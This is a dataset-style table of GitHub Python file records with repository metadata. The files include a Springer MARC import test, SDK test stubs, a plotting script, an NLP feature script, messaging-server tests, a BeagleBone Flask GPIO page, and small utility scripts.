blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bd78505b0cfbc80351ec303ebf0a8a3b65befbfb | 75d318b2f125ec1d08195f12f8cc3870b3aa3056 | /tests/importer/test_springer_dojson.py | 9842bcd989109623adacf2194c5674ceffdd1352 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | topless/cds-books | d496913da2fdbcc42bf7bc7987fe60f80d6af35a | e587fec6c191fddebce3c3f9f61aae625db31254 | refs/heads/master | 2023-01-24T19:19:25.923716 | 2020-11-25T13:20:48 | 2020-11-26T07:49:11 | 257,366,115 | 0 | 0 | MIT | 2020-04-20T18:12:40 | 2020-04-20T18:12:39 | null | UTF-8 | Python | false | false | 3,655 | py | import os
from cds_dojson.marc21.utils import create_record
from cds_ils.importer.providers.springer.springer import model
marcxml = (
"""<collection xmlns="http://www.loc.gov/MARC21/slim">"""
"""<record>{0}</record></collection>"""
)
def check_transformation(marcxml_body, json_body):
    """Assert that the Springer model converts *marcxml_body* into *json_body*.

    The MARCXML fragment is wrapped in the collection/record envelope,
    parsed, run through the dojson ``model``, and compared field-for-field
    against the expected JSON dict.
    """
    parsed = create_record(marcxml.format(marcxml_body))
    transformed = dict(model.do(parsed, ignore_missing=True))
    expected = dict(json_body)
    assert transformed == expected
def test_springer_transformation(app):
    """Check that a sample Springer MARCXML record converts to the expected JSON.

    Reads ``data/springer_record.xml`` next to this test module and compares
    the full transformed record against the literal below.
    """
    dirname = os.path.join(os.path.dirname(__file__), "data")
    with open(os.path.join(dirname, "springer_record.xml"), "r") as fp:
        example = fp.read()
    # The transformation is exercised inside a Flask application context
    # (the ``app`` pytest fixture provides the application).
    with app.app_context():
        check_transformation(
            example,
            {
                "_eitem": {
                    "internal_note": "Physics and Astronomy (R0) "
                    "(SpringerNature-43715)",
                    "urls": [
                        {
                            "description": "E-book by Springer",
                            "value": "https://doi.org/10.1007/b100336",
                        }
                    ],
                },
                "provider_recid": "978-0-306-47915-1",
                "_serial": [
                    {
                        "title": "Advances in Nuclear Physics ;",
                        "volume": "26",
                    }
                ],
                "abstract": "The four articles ...",
                "agency_code": "DE-He213",
                "alternative_titles": [
                    {"type": "SUBTITLE", "value": "Volume 26 /"}
                ],
                "alternative_identifiers": [
                    {"scheme": "SPRINGER", "value": "978-0-306-47915-1"}
                ],
                "authors": [
                    {"full_name": "Negele, J.W.", "roles": ["EDITOR"]},
                    {"full_name": "Vogt, Erich W.", "roles": ["EDITOR"]},
                ],
                "document_type": "BOOK",
                "edition": "1st ed. 2001.",
                "identifiers": [
                    {"scheme": "ISBN", "value": "9780306479151"},
                    {"scheme": "ISBN", "value": "9780306479151X"},
                ],
                "imprint": {
                    "date": "2001.",
                    "place": "New York, NY :",
                    "publisher": "Springer US :, Imprint: Springer,",
                },
                "keywords": [
                    {"source": "SPR", "value": "Nuclear physics."},
                    {"source": "SPR", "value": "Heavy ions."},
                    {
                        "source": "SPR",
                        "value": "Nuclear Physics, Heavy Ions, Hadrons.",
                    },
                ],
                "number_of_pages": "386",
                "publication_year": "2001.",
                "subjects": [
                    {"scheme": "LoC", "value": "QC770-798"},
                    {"scheme": "LoC", "value": "QC702.7.H42"},
                    {"scheme": "Dewey", "value": "539.7092"},
                ],
                "table_of_content": [
                    "The Spin Structure of the Nucleon",
                    "Liquid-Gas Phase Transition in Nuclear "
                    "Multifragmentation",
                    "High Spin Properties of Atomic Nuclei",
                    "The Deuteron: Structure and Form Factors.",
                ],
                "title": "Advances in Nuclear Physics",
            },
        )
| [
"38131488+kprzerwa@users.noreply.github.com"
] | 38131488+kprzerwa@users.noreply.github.com |
affe4860d2c5900e87b8d5ca7f0a608119533a85 | 46ac0965941d06fde419a6f216db2a653a245dbd | /sdks/python/test/test_DistributionGroupUserGetResponse.py | f382222ea7f9f529b0ed88420c679534d6be68a3 | [
"MIT",
"Unlicense"
] | permissive | b3nab/appcenter-sdks | 11f0bab00d020abb30ee951f7656a3d7ed783eac | bcc19c998b5f648a147f0d6a593dd0324e2ab1ea | refs/heads/master | 2022-01-27T15:06:07.202852 | 2019-05-19T00:12:43 | 2019-05-19T00:12:43 | 187,386,747 | 0 | 3 | MIT | 2022-01-22T07:57:59 | 2019-05-18T17:29:21 | Python | UTF-8 | Python | false | false | 1,066 | py | # coding: utf-8
"""
App Center Client
Microsoft Visual Studio App Center API # noqa: E501
OpenAPI spec version: preview
Contact: benedetto.abbenanti@gmail.com
Project Repository: https://github.com/b3nab/appcenter-sdks
"""
from __future__ import absolute_import
import unittest
import appcenter_sdk
from DistributionGroupUserGetResponse.clsDistributionGroupUserGetResponse import DistributionGroupUserGetResponse # noqa: E501
from appcenter_sdk.rest import ApiException
class TestDistributionGroupUserGetResponse(unittest.TestCase):
    """DistributionGroupUserGetResponse unit test stubs (generated scaffold)."""

    def setUp(self):
        # No fixtures required for this generated stub.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testDistributionGroupUserGetResponse(self):
        """Test DistributionGroupUserGetResponse"""
        # FIXME: construct object with mandatory attributes with example values
        # model = appcenter_sdk.models.clsDistributionGroupUserGetResponse.DistributionGroupUserGetResponse() # noqa: E501
        pass
| [
"b3nab@users.noreply.github.com"
] | b3nab@users.noreply.github.com |
60c9114f98ec2437c232bbed5e91ca263ce743d2 | a6432a0443b0f32b68baa4632397bc83abb0dfd4 | /ugali/scratch/PlotValidation.py | 764c76c047d5df17b9d1da20201c34dfbead05b6 | [
"MIT"
] | permissive | norashipp/ugali | d795c016e52d8c9639b214bd83ca610d052cb10f | 812bd9222737b9ffd36cfc2f2d058d948fc0522a | refs/heads/master | 2021-01-19T17:06:08.030637 | 2016-07-08T14:14:57 | 2016-07-08T14:14:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,430 | py | #!/usr/bin/env python
from os.path import splitext,basename
import pylab as plt
import numpy as np
if __name__ == "__main__":
    from optparse import OptionParser
    usage = "Usage: %prog [options] input"
    description = "python script"
    parser = OptionParser(usage=usage,description=description)
    (opts, args) = parser.parse_args()
    # Each positional argument is a .dat results file whose name encodes
    # metadata separated by underscores (label first, extension at index 4).
    for arg in args:
        if splitext(arg)[1] != '.dat':
            raise Exception('Input not .dat files')
        params = basename(arg).split('_')
        label = params[0]
        ext = params[4]
        # HACK: the .dat file is a Python literal that is eval'd directly.
        # Only run this on trusted input files.
        s = ''.join(open(arg).readlines())
        results = eval(s)
        logLike = np.array(results['log_likelihood'])
        low,rich,up = np.array([results['richness_lower'],
                                results['richness'],
                                results['richness_upper']])
        mass = np.array(results['stellar_mass'])
        # Convert richness (and its bounds) into stellar-mass units.
        norm = mass/rich
        low *= norm
        rich *= norm
        up *= norm
        plt.errorbar(range(len(rich)), rich, yerr=[rich-low, up-rich], fmt='o',label=label)
        # Dashed red line: mean recovered mass; dashed black: true MC masses.
        plt.axhline(np.mean(rich),ls='--',color='r')
        for mc_mass in np.unique(results['mc_stellar_mass']):
            plt.axhline(mc_mass,ls='--',color='k')
        plt.title(r'Likelihood Comparison ($r_h = %s$ deg)'%ext)
        plt.ylabel(r'Stellar Mass ($M_{\odot}$)')
        plt.legend(loc='upper right')
        # NOTE(review): saved once per input file; later files overwrite
        # earlier ones when params[1] and ext coincide.
        plt.savefig("%s_%s.png"%(params[1],ext))
| [
"kadrlica@fnal.gov"
] | kadrlica@fnal.gov |
3166b0f241324912b43ecb7470e3cd06ddf95705 | 7d5641f61e9317984dc656ae43658f9f09a3d2c5 | /72.py | bec0164cd0e98e23a3695b3ae6615592e2bebae6 | [
"MIT"
] | permissive | r9y9/nlp100 | 51ec6b1a13128a53eeda9ff110d122211f0fceba | 391ca6c4fb8afc074ed825404d4ad4efc4467f05 | refs/heads/master | 2021-01-25T09:00:54.021853 | 2017-06-09T17:32:52 | 2017-06-09T17:32:52 | 93,770,527 | 18 | 8 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | from stemming.porter2 import stem
import sys
import numpy as np
# Build a corpus-wide frequency table of stemmed, lowercased tokens.
# Each line of sentiment.txt is "<label> <word> <word> ..."; the leading
# sentiment label is skipped.
vocab = {}
with open("sentiment.txt") as f:
    lines = f.readlines()
    for line in lines:
        line = line[:-1].lower()  # drop trailing newline
        words = line.split(" ")[1:]
        words = list(map(stem, words))
        for word in words:
            if word in vocab:
                vocab[word] += 1
            else:
                vocab[word] = 1
def build_idx(vocab):
    """Map each vocabulary word to a unique, dense integer index.

    Indices follow the dict's insertion order, exactly as the original
    counter-based loop did (dicts preserve insertion order on Python 3.7+).

    Args:
        vocab: mapping (or any iterable) whose keys are the vocabulary words.

    Returns:
        dict mapping word -> index in range(len(vocab)).
    """
    # enumerate() replaces the manual counter; the old trailing
    # ``assert count == len(vocab)`` was tautological and is dropped.
    return {word: idx for idx, word in enumerate(vocab)}
def sentence2features(words, vocab, word2idx):
    """Return a bag-of-words count vector for *words*.

    Args:
        words: iterable of (stemmed) tokens; each token must appear in
            ``word2idx``.
        vocab: full vocabulary; only its size is used here.
        word2idx: mapping from word to column index.

    Returns:
        1-D numpy integer array of length ``len(vocab)`` holding per-word
        occurrence counts.

    Raises:
        KeyError: if a word is missing from ``word2idx`` (same as before).
    """
    # ``np.int`` was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin ``int`` gives the same default integer dtype.
    x = np.zeros(len(vocab), dtype=int)
    for word in words:
        x[word2idx[word]] += 1
    return x
# Take the K most frequent words as "stopwords": sort ascending by count,
# reverse, and keep the top K. Ties at the cutoff are resolved arbitrarily.
K = 13
stopwords = sorted(vocab.items(), key=lambda x: x[1])[:: -1][: K]
for k, v in stopwords:
    print(k, v)
stopwords_dict = dict(stopwords)
# Debug output: vocabulary size and the count for the stem "like"
# (None if absent).
print(len(vocab))
print(vocab.get("like"))
word2idx = build_idx(vocab)
def is_stopword(x, stopwords_dict=stopwords_dict):
    """Return True iff *x* is one of the precomputed top-K stopwords."""
    return x in stopwords_dict
def is_not_stopword(x, stopwords_dict=stopwords_dict):
    """Return True iff *x* is NOT a stopword; used as a filter() predicate."""
    return x not in stopwords_dict
# Second pass over the corpus: build the design matrix X (bag-of-words
# counts, stopwords removed) and the label vector Y (0 for "+1", 1 otherwise).
X = []
Y = []
with open("sentiment.txt") as f:
    lines = f.readlines()
    for line in lines:
        line = line[: -1].lower()
        y, words = line.split(" ")[0], line.split(" ")[1:]
        y = 0 if (y == "+1") else 1
        words = list(map(stem, words))
        words = list(filter(is_not_stopword, words))
        x = sentence2features(words, vocab, word2idx)
        X.append(x)
        Y.append(y)
X = np.array(X)
Y = np.array(Y)
print(X.shape)
print(Y.shape)
# Script intentionally stops here (features built, nothing trained yet).
sys.exit(0)
| [
"zryuichi@gmail.com"
] | zryuichi@gmail.com |
603f0a1c5a4fbe205d9f940387c07dbb827e0755 | d780df6e068ab8a0f8007acb68bc88554a9d5b50 | /python/g1/messaging/tests/test_servers.py | 712fd78186bd0542a9ffc468cae2f57cbe9277a7 | [
"MIT"
] | permissive | clchiou/garage | ed3d314ceea487b46568c14b51e96b990a50ed6f | 1d72863d3a5f5d620b170f4dd36f605e6b72054f | refs/heads/master | 2023-08-27T13:57:14.498182 | 2023-08-15T07:09:57 | 2023-08-15T19:53:52 | 32,647,497 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,217 | py | import unittest
import unittest.mock
import uuid
from g1.asyncs import kernels
from g1.asyncs.bases import tasks
from g1.messaging import reqrep
from g1.messaging.reqrep import clients
from g1.messaging.reqrep import servers
from g1.messaging.wiredata import jsons
class InvalidRequestError(Exception):
    """Error type the server under test reports for undecodable requests."""
class InternalServerError(Exception):
    """Error type the server under test reports for unexpected failures."""
@reqrep.raising(InvalidRequestError, InternalServerError)
class TestInterface:
    """Interface declaration fed to reqrep.generate_interface_types below."""

    @reqrep.raising(ValueError)
    def greet(self, name: str) -> str:
        raise NotImplementedError

    def f(self):
        raise NotImplementedError

    def g(self):
        raise NotImplementedError

    def h(self):
        raise NotImplementedError
@reqrep.raising(InternalServerError)
class TestOnlyOneError:
    """Interface declaring exactly one error type (see test_only_one_error)."""

    def f(self):
        raise NotImplementedError
# Don't inherit from ``TestInterface`` because we intentionally leave
# out ``f`` unimplemented.
class TestApplication:
    """Server-side implementation used by ServerTest.

    ``f`` is deliberately left unimplemented (per the module comment above
    this class) to exercise the unknown-method error path.
    """
    # pylint: disable=no-self-use

    async def greet(self, name):
        return 'Hello, %s' % name

    async def g(self):
        # Returns a bare object() the wire format cannot serialize,
        # triggering the to_lower error path in the server.
        return object()

    async def h(self):
        # Test error that is not declared in the interface.
        raise RuntimeError
Request, Response = reqrep.generate_interface_types(TestInterface, 'Test')
WIRE_DATA = jsons.JsonWireData()
class ServerTest(unittest.TestCase):
    """Tests for g1.messaging.reqrep.servers.Server."""

    def test_only_one_error(self):
        # A single declared error should map to its snake_cased field name.
        request_type, response_type = \
            reqrep.generate_interface_types(TestOnlyOneError)
        server = servers.Server(
            TestOnlyOneError(),
            request_type,
            response_type,
            WIRE_DATA,
        )
        self.assertEqual(
            server._declared_error_types,
            {InternalServerError: 'internal_server_error'},
        )

    @kernels.with_kernel
    def test_serve(self):
        server = servers.Server(
            TestApplication(),
            Request,
            Response,
            WIRE_DATA,
            invalid_request_error=InvalidRequestError(),
            internal_server_error=InternalServerError(),
        )
        # Happy path: a well-formed greet request round-trips.
        wire_request = WIRE_DATA.to_lower(
            Request(args=Request.m.greet(name='world'))
        )
        self.assertEqual(
            WIRE_DATA.to_upper(
                Response,
                kernels.run(server._serve(wire_request)),
            ),
            Response(result=Response.Result(greet='Hello, world')),
        )
        # Undecodable request bytes -> invalid_request_error.
        with self.assertLogs(servers.__name__, level='DEBUG') as cm:
            self.assertEqual(
                kernels.run(server._serve(b'')),
                server._invalid_request_error_wire,
            )
        self.assertRegex('\n'.join(cm.output), r'to_upper error: ')
        # Method declared in the interface but missing from the
        # application -> invalid_request_error.
        wire_request = WIRE_DATA.to_lower(Request(args=Request.m.f()))
        with self.assertLogs(servers.__name__, level='DEBUG') as cm:
            self.assertEqual(
                kernels.run(server._serve(wire_request)),
                server._invalid_request_error_wire,
            )
        self.assertRegex('\n'.join(cm.output), r'unknown method: f: ')
        # Unserializable result -> internal_server_error.
        wire_request = WIRE_DATA.to_lower(Request(args=Request.m.g()))
        with self.assertLogs(servers.__name__, level='DEBUG') as cm:
            self.assertEqual(
                kernels.run(server._serve(wire_request)),
                server._internal_server_error_wire,
            )
        self.assertRegex('\n'.join(cm.output), r'to_lower error: ')
        # Undeclared exception raised by the handler -> internal_server_error.
        wire_request = WIRE_DATA.to_lower(Request(args=Request.m.h()))
        with self.assertLogs(servers.__name__, level='DEBUG') as cm:
            self.assertEqual(
                kernels.run(server._serve(wire_request)),
                server._internal_server_error_wire,
            )
        self.assertRegex('\n'.join(cm.output), r'server error: ')

    @kernels.with_kernel
    def test_end_to_end(self):

        def do_test(client, server, server_serve):
            # Wire client and server together over an in-process socket.
            url = 'inproc://%s' % uuid.uuid4()
            server.socket.listen(url)
            client.socket.dial(url)
            server_task = tasks.spawn(server_serve)
            client_task = tasks.spawn(client.m.greet(name='world'))
            with self.assertRaises(kernels.KernelTimeout):
                kernels.run(timeout=0.005)
            self.assertTrue(client_task.is_completed())
            self.assertEqual(
                client_task.get_result_nonblocking(), 'Hello, world'
            )
            # The server loop only exits after its socket is closed.
            self.assertFalse(server_task.is_completed())
            server.socket.close()
            kernels.run(timeout=1)
            self.assertTrue(server_task.is_completed())
            self.assertIsNone(server_task.get_result_nonblocking())

        # Exercise both nesting orders of the context managers.
        app = TestApplication()
        with servers.Server(app, Request, Response, WIRE_DATA) as server:
            with clients.Client(Request, Response, WIRE_DATA) as client:
                do_test(client, server, server.serve)

        app = TestApplication()
        server = servers.Server(app, Request, Response, WIRE_DATA)
        with clients.Client(Request, Response, WIRE_DATA) as client:
            with server:
                do_test(client, server, server.serve)
if __name__ == '__main__':
unittest.main()
| [
"clchiou@gmail.com"
] | clchiou@gmail.com |
e17e6c8ecbe5505cbafb9db285c12c2de832cc48 | 62def70e2d802375b1ad28b0ac85fee2010ee0a9 | /flask/server/app2-BBIO.py | 6f563a5c2b1d5a7dd221b84ec1d0f31098dcec96 | [] | no_license | MarkAYoder/BeagleBoard-exercises | c48028b6e919d8c04dedfd2040a133c760f0f567 | 2fab7c7f7aa09bf101168dfb279e690bc43a6514 | refs/heads/master | 2023-07-22T08:06:19.482358 | 2023-07-12T19:24:51 | 2023-07-12T19:24:51 | 5,111,513 | 48 | 41 | null | 2021-07-29T18:02:29 | 2012-07-19T15:07:14 | JavaScript | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python3
# From: https://towardsdatascience.com/python-webserver-with-flask-and-raspberry-pi-398423cc6f5d
'''
Raspberry Pi GPIO Status and Control
'''
import Adafruit_BBIO.GPIO as GPIO
from flask import Flask, render_template
app = Flask(__name__)
button = "P9_11"  # BeagleBone header pin wired to the push button
buttonSts = GPIO.LOW  # module-level default; index() rebinds a local copy
# Set button as an input
GPIO.setup(button, GPIO.IN)
@app.route("/")
def index():
    """Render the GPIO status page with the button's current state."""
    # Read Button Status (value returned by Adafruit_BBIO GPIO.input).
    buttonSts = GPIO.input(button)
    templateData = {
        'title' : 'GPIO input Status!',
        'button' : buttonSts,
    }
    # ``**templateData`` unpacks the dict as template variables.
    return render_template('index2.html', **templateData)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8081, debug=True) | [
"Mark.A.Yoder@Rose-Hulman.edu"
] | Mark.A.Yoder@Rose-Hulman.edu |
346179e283175d7b6d77bf0f1c6eb55cd7503df9 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/2/fc8.py | 4b833c69ff0ca02bdfddeccb42554670e3953c1a | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
    # Python 2 code. Expects the tokens following the 'fC8' keyword.
    # NOTE(review): only prints when the first and last tokens are each
    # exactly a lone double-quote character; a token like '"hello' does
    # not match -- confirm this is the intended grammar.
    if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            # data to print: drop the surrounding quote tokens, join the rest
            lineRemaining = lineRemaining[1:-1]
            print ' '.join(lineRemaining)
        else:
            # empty string literal: print a blank line
            print
def main(fileName):
    # Interpret each line of the file: lines whose first token is 'fC8'
    # are print statements; any other line prints ERROR and stops.
    # NOTE(review): a blank line would raise IndexError on data[0].
    with open(fileName) as f:
        for line in f:
            data = line.split()
            if data[0] == 'fC8':
                printFunction(data[1:])
            else:
                print 'ERROR'
                return
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
233f0d40f307d09932e85c5edd77a34aeee76a96 | d0efa2026b7ed22ff4f9aa76c27ae2474c30f26d | /test/test_footer.py | 3535a50683a08f16c069762bca0020279cf550fd | [] | no_license | begum-akbay/Python | 2075650e0ddbf1c51823ebd749742646bf221603 | fe8b47e29aae609b7510af2d21e53b8a575857d8 | refs/heads/master | 2023-03-28T00:11:00.997194 | 2021-03-25T16:38:17 | 2021-03-25T16:38:17 | 351,499,957 | 0 | 0 | null | 2021-03-25T16:38:17 | 2021-03-25T16:15:16 | Python | UTF-8 | Python | false | false | 1,022 | py | # coding: utf-8
"""
Payment Gateway API Specification.
The documentation here is designed to provide all of the technical guidance required to consume and integrate with our APIs for payment processing. To learn more about our APIs please visit https://docs.firstdata.com/org/gateway. # noqa: E501
The version of the OpenAPI document: 21.1.0.20210122.001
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import openapi_client
from openapi_client.models.footer import Footer # noqa: E501
from openapi_client.rest import ApiException
class TestFooter(unittest.TestCase):
    """Footer unit test stubs (generated scaffold)."""

    def setUp(self):
        # No fixtures required for this generated stub.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testFooter(self):
        """Test Footer"""
        # FIXME: construct object with mandatory attributes with example values
        # model = openapi_client.models.footer.Footer() # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"emargules@bluepay.com"
] | emargules@bluepay.com |
65fc44fd2cb52915fa25c53464419caacae2ac56 | 2b6fa34dac030ec1f2918b1377956bf791219d22 | /leetcode/medium/search-a-2d-matrix.py | 172983011abfef17fc0165532c2d6bed9454af6f | [
"MIT"
] | permissive | rainzhop/cumulus-tank | aa13fb8f14c27893838a67d2eb69fdd2ac3d6450 | 09ebc7858ea53630e30606945adfea856a80faa3 | refs/heads/master | 2020-06-06T23:24:37.498966 | 2020-01-06T09:52:16 | 2020-01-06T09:52:16 | 192,874,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,074 | py | # https://leetcode.com/problems/search-a-2d-matrix/
#
# Write an efficient algorithm that searches for a value in an m x n matrix.
# This matrix has the following properties:
#
# Integers in each row are sorted from left to right.
# The first integer of each row is greater than the last integer of the previous row.
#
# For example,
# Consider the following matrix:
# [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# Given target = 3, return true.
class Solution(object):
    def searchMatrix(self, matrix, target):
        """Search a sorted m x n matrix for target.

        Rows are sorted left-to-right and each row starts after the previous
        row ends, so binary-search over rows by their last element, then
        check membership in the single candidate row.

        :type matrix: List[List[int]]
        :type target: int
        :rtype: bool
        """
        # Guard against an empty matrix or empty first row (the original
        # raised IndexError on matrix[0][0]).
        if not matrix or not matrix[0]:
            return False
        # Quick reject when target lies outside the matrix's value range.
        if target < matrix[0][0] or target > matrix[-1][-1]:
            return False
        left, right = 0, len(matrix) - 1
        while left != right:
            # Floor division: plain '/' yields a float index on Python 3.
            mid = (left + right) // 2
            if target < matrix[mid][-1]:
                right = mid
            else:
                left = mid + 1
        return target in matrix[left]
| [
"rainzhop@gmail.com"
] | rainzhop@gmail.com |
87565ac9145b88260426230d9548b3bfc3db3b37 | edbb63696580638af0084ee318d2c9bc9e8c7e79 | /text_wc_2.py | 8cd11af58e5aef643a13ed0776bd13036ca2bad0 | [] | no_license | awaddell77/Scrapers | fef34e34b8e039f4992497cae75135cdb57b2581 | 0a36fb2c99f2d7b90533834b29c0ba8f27c13a85 | refs/heads/master | 2020-05-21T13:44:06.524855 | 2020-03-16T23:00:45 | 2020-03-16T23:00:45 | 62,753,048 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 483 | py | def text_wc(x,output='listoutput.txt', directory = 'C:\\Users\\Owner\\', v = 0):#takes list writes to text
n_l = x
name = directory + output
with open(name, 'w') as wf:
for i in range(0, len(n_l)):
if v != 0:
print(n_l[i])
new = n_l[i]
wf.writelines(new)
else:
new = n_l[i]
wf.writelines(new)
print("%s saved to %s" % (output, directory))
return True | [
"waddell.andrew@gmail.com"
] | waddell.andrew@gmail.com |
7b296749e9a4ef07b6b90aa915c8778c1bd21a26 | 9f951479d5eda96e7fecbbbd0b3b7e4f5e83360d | /webtest/全栈课程代码学员版/Level2Code/Level2Code/lesson6URL/LessonCode/firstsite/firstapp/views.py | 8f9b6e20978ccae64d476c71c7351b075f6ff647 | [] | no_license | lianbo2006/Project | 44c5b6fcab4fe31b80bfff467b3e0e31fd2da8ba | 5d13923817a1d4cffe7d4abbb5873277ce28bb87 | refs/heads/master | 2021-01-11T18:24:47.597849 | 2017-04-25T03:44:47 | 2017-04-25T03:44:47 | 79,539,300 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | from django.shortcuts import render, HttpResponse, redirect
from firstapp.models import Aritcle, Comment
from django.template import Context, Template
from firstapp.form import CommentForm
def index(request):
    """List all articles, optionally filtered by the ``?tag=`` query param.

    Args:
        request: the incoming HttpRequest.

    Returns:
        Rendered ``first_web_2.html`` with ``article_list`` in the context.
    """
    # Removed leftover debug prints of the request object / dir(request) /
    # type(request) that were spamming stdout on every page view.
    queryset = request.GET.get('tag')
    if queryset:
        article_list = Aritcle.objects.filter(tag=queryset)
    else:
        article_list = Aritcle.objects.all()
    context = {}
    context['article_list'] = article_list
    index_page = render(request, 'first_web_2.html', context)
    return index_page
def detail(request, page_num, error_form=None):
    """Render one article's detail page.

    Args:
        request: the incoming HttpRequest.
        page_num: primary key of the Aritcle to display.
        error_form: a bound CommentForm carrying validation errors, passed
            back by detail_comment() so the errors are re-displayed.
    """
    context = {}
    form = CommentForm
    a = Aritcle.objects.get(id=page_num)
    # Show the comment flagged as "best" for this article, if any.
    best_comment = Comment.objects.filter(best_comment=True, belong_to=a)
    if best_comment:
        context['best_comment'] = best_comment[0]
    # NOTE(review): this re-fetches the same Aritcle already held in ``a``.
    article = Aritcle.objects.get(id=page_num)
    context['article'] = article
    # context['comment_list'] = comment_list
    if error_form is not None:
        context['form'] = error_form
    else:
        context['form'] = form
    return render(request, 'article_detail.html', context)
def detail_comment(request, page_num):
    """Handle a posted comment for article *page_num*.

    On valid input, saves the comment and redirects back to the detail page
    (POST/redirect/GET pattern). On invalid input, re-renders the detail
    page with the bound form so validation errors are shown.
    """
    form = CommentForm(request.POST)
    if form.is_valid():
        name = form.cleaned_data['name']
        comment = form.cleaned_data['comment']
        a = Aritcle.objects.get(id=page_num)
        c = Comment(name=name, comment=comment, belong_to=a)
        c.save()
    else:
        return detail(request, page_num, error_form=form)
    return redirect(to='detail', page_num=page_num)
| [
"513748889@qq.com"
] | 513748889@qq.com |
77080eb1b0672d0647b0341846a888bc476e3a0a | d18d7f86a1e701caada063d09ee00fe08a95e353 | /test/kapp/sys/ys/calc/calc_mpi_openmp_stategen/intel/runtest.py | 047f4715d694e464ec32c28be77152923524d7a0 | [
"BSD-3-Clause"
] | permissive | E3SM-Project/KGen | 2e097b2ef979b42b094089f337d49240838aa13b | c0035c93d21286da6519a74ff527b6a009781de4 | refs/heads/master | 2021-02-14T00:01:10.939108 | 2020-06-15T18:49:58 | 2020-06-15T18:49:58 | 244,747,822 | 3 | 0 | NOASSERTION | 2020-03-03T21:43:57 | 2020-03-03T21:43:56 | null | UTF-8 | Python | false | false | 1,790 | py | import sys
from kapp_sys_ys_calc_calc_mpi_openmp_stategen_test import KAppSysYSCalcCOSTest
import time
class Test(KAppSysYSCalcCOSTest):
    """KGen kernel-extraction test for the MPI+OpenMP calc app (Intel)."""

    def generate(self, myname, result):
        # Paths prepared by earlier pipeline tasks.
        workdir = result['mkdir_task']['workdir']
        tmpsrc = result['download_task']['tmpsrc']
        srcfile = '%s/bridge_mod.F90'%tmpsrc
        # Environment setup executed before both build and run phases.
        prerun = 'module swap intel intel/16.0.1; module try-load impi/5.0.1.035'
        # Extract the kernel with state generation: 2 MPI ranks x selected
        # OpenMP threads, rebuilding state data each time.
        passed, out, err = self.extract_kernel(srcfile, None, \
            __cmd_clean='"cd %s; make -f Makefile.mpirun clean"'%tmpsrc, \
            __cmd_build='"cd %s; make -f Makefile.mpirun build"'%tmpsrc, \
            __cmd_run='"cd %s; make -f Makefile.mpirun run"'%tmpsrc, \
            __invocation='0-1:0:1,2-3:0:3', \
            __timing='repeat=1', \
            __prerun='build="%s",run="%s"'%(prerun, prerun), \
            __mpi='enable', \
            __openmp='enable,omp_num_threads=10', \
            __rebuild='state', \
            __outdir=workdir)
            #__debug='printvar=:i,:j,:output',
        result[myname]['stdout'] = out
        result[myname]['stderr'] = err
        result[myname]['datadir'] = '%s/data'%workdir
        if passed:
            # State files expected from invocations (rank.thread.invocation).
            result[myname]['statefiles'] = ['update.0.0.1', 'update.1.0.1', 'update.2.0.3', 'update.3.0.3' ]
            self.set_status(result, myname, self.PASSED)
        else:
            result[myname]['statefiles'] = []
            self.set_status(result, myname, self.FAILED, 'STDOUT: %s\nSTDERR: %s'%(out, err))
        return result
if __name__ == "__main__":
# we may allow to run this test individually
print('Please do not run this script from command line. Instead, run this script through KGen Test Suite .')
print('Usage: cd ${KGEN_HOME}/test; ./kgentest.py')
sys.exit(-1)
| [
"youngsun@ucar.edu"
] | youngsun@ucar.edu |
